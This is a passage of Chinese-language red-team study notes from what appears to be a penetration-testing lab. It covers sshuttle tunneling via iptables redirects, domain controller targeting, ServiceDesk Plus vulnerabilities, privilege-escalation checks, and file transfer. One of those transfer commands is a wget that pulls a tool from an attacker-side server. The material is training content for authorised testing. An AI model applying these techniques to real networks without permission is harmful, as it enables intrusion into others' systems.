   pkts bytes target     prot opt in     out     source               destination         
      1    52 sshuttle-12300  all  --  *      *       0.0.0.0/0            0.0.0.0/0           
  
  Chain POSTROUTING (policy ACCEPT 0 packets, 0 bytes)
   pkts bytes target     prot opt in     out     source               destination         
  
  Chain sshuttle-12300 (2 references)
   pkts bytes target     prot opt in     out     source               destination         
      0     0 RETURN     tcp  --  *      *       0.0.0.0/0            127.0.0.1           
      0     0 REDIRECT   tcp  --  *      *       0.0.0.0/0            192.168.20.0/24      redir ports 12300
      0     0 REDIRECT   tcp  --  *      *       0.0.0.0/0            192.168.21.0/24      redir ports 12300
      0     0 RETURN     all  --  *      *       0.0.0.0/0            0.0.0.0/0            ADDRTYPE match dst-type LOCAL
  

  
  而是通过下面这条 iptables NAT 规则来劫持：
  
  Chain sshuttle-12300 (2 references) pkts bytes target prot opt in out source destination 0 0 RETURN tcp -- * * 0.0.0.0/0 127.0.0.1 0 0 REDIRECT tcp -- * * 0.0.0.0/0 192.168.20.0/24 redir ports 12300 0 0 REDIRECT tcp -- * * 0.0.0.0/0 192.168.21.0/24 redir ports 12300 0 0 RETURN all -- * * 0.0.0.0/0 0.0.0.0/0 ADDRTYPE match dst-type LOCAL
  
  

4. 隧道维护与管理

• 每日重启靶机后需要重新建立隧道

• 使用脚本自动化隧道建立过程

• 注意可能的网段冲突问题

• 隧道支持TCP流量，但可能不支持ICMP

四、进阶内网渗透技术

1. 域控制器分析

• 192.168.20.10(DC)是内网的核心目标

• 需要深入了解域控制器的安全结构

• 计划使用域渗透技术如Kerberoasting等

2. Web服务分析

• 对192.168.20.15上的web服务进行分析

• 对192.168.21.123上的Manage Engine Service Desk Plus进行漏洞分析

• 研究发现Service Desk Plus存在已知漏洞

3. 漏洞利用策略

• 对发现的服务进行漏洞利用研究

• 优先关注关键业务系统

• 准备本地环境复现可能的漏洞

4. 提权尝试与分析

• Linux内核版本：5.15（已从4.15.126更新）

• 尝试dirty pipe等内核漏洞未成功

• 提权虽未成功，但仍要尝试多种提权方式

  # 检查内核版本
  uname -a
  
  # 查找SUID文件
  find / -perm -u=s -type f 2>/dev/null

五、实战技巧与方法论

1. 信息枚举的完整性

• 务必使用多种工具和技术进行信息收集

• 不要因信息量大而忽略细节

• 使用工具时需注意权限和系统限制

2. 攻击路径规划

• 基于收集的信息制定攻击路径

• 优先级排序：域控 > 关键业务系统 > 一般资源

• 保持对网络拓扑的全局理解

3. 运维视角与安全意识

• 从运维角度思考网络架构和安全措施

• 理解IP分配规律（如主机位保持一致）

• 注意避免破坏生产环境

4. 工具技能与编译能力

• 掌握各种工具的编译与使用

• 了解静态二进制文件的优势

• 警惕使用他人编译的工具可能存在的风险

5. 文件传输技术

• 使用SCP安全复制文件

• 使用简易Web服务器传输文件（如Go Simple HTTP Server）

• 考虑加密通信减少被检测风险

  # 使用简易HTTP服务器
  wget http://10.10.16.122/go-shs
  
  # 使用SCP传输文件
  scp file.txt user@remote:/path/
  

6. 隧道和代理技术掌握

• 理解不同隧道技术的优缺点

• 学习端口转发的逻辑与方向

• 掌握多层隧道的构建方法

通过以上系统化的知识整理，完整覆盖了红队渗透测试中从获取立足点到内网信息收集与隧道建立的关键技术与方法。这些内容对于理解和实践内网渗透至关重要，为后续更深入的域渗透和权限提升奠定了基础。

-.-